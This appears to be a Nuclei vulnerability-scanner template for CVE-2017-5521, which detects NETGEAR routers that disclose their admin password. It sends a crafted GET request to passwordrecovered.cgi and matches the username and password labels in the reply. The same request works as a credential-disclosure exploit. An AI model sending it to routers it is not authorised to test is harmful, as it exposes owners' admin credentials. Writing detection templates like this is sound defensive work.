id: CVE-2017-5521

info:
  name: Bypassing Authentication on NETGEAR Routers
  author: princechaddha
  severity: high
  description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server.
  reference:
    - https://www.cvedetails.com/cve/CVE-2017-5521/
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-5521
    cwe-id: CWE-200
  tags: cve,cve2017,auth-bypass,netgear

requests:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id=nuclei"

    matchers-condition: and
    matchers:
      # The patterns use \s*, so they must be evaluated as regular expressions;
      # a word matcher would look for the literal characters "\s*" and never match.
      - type: regex
        regex:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and
        part: body

      # Both credential labels must appear in a 200 response.
      - type: status
        status:
          - 200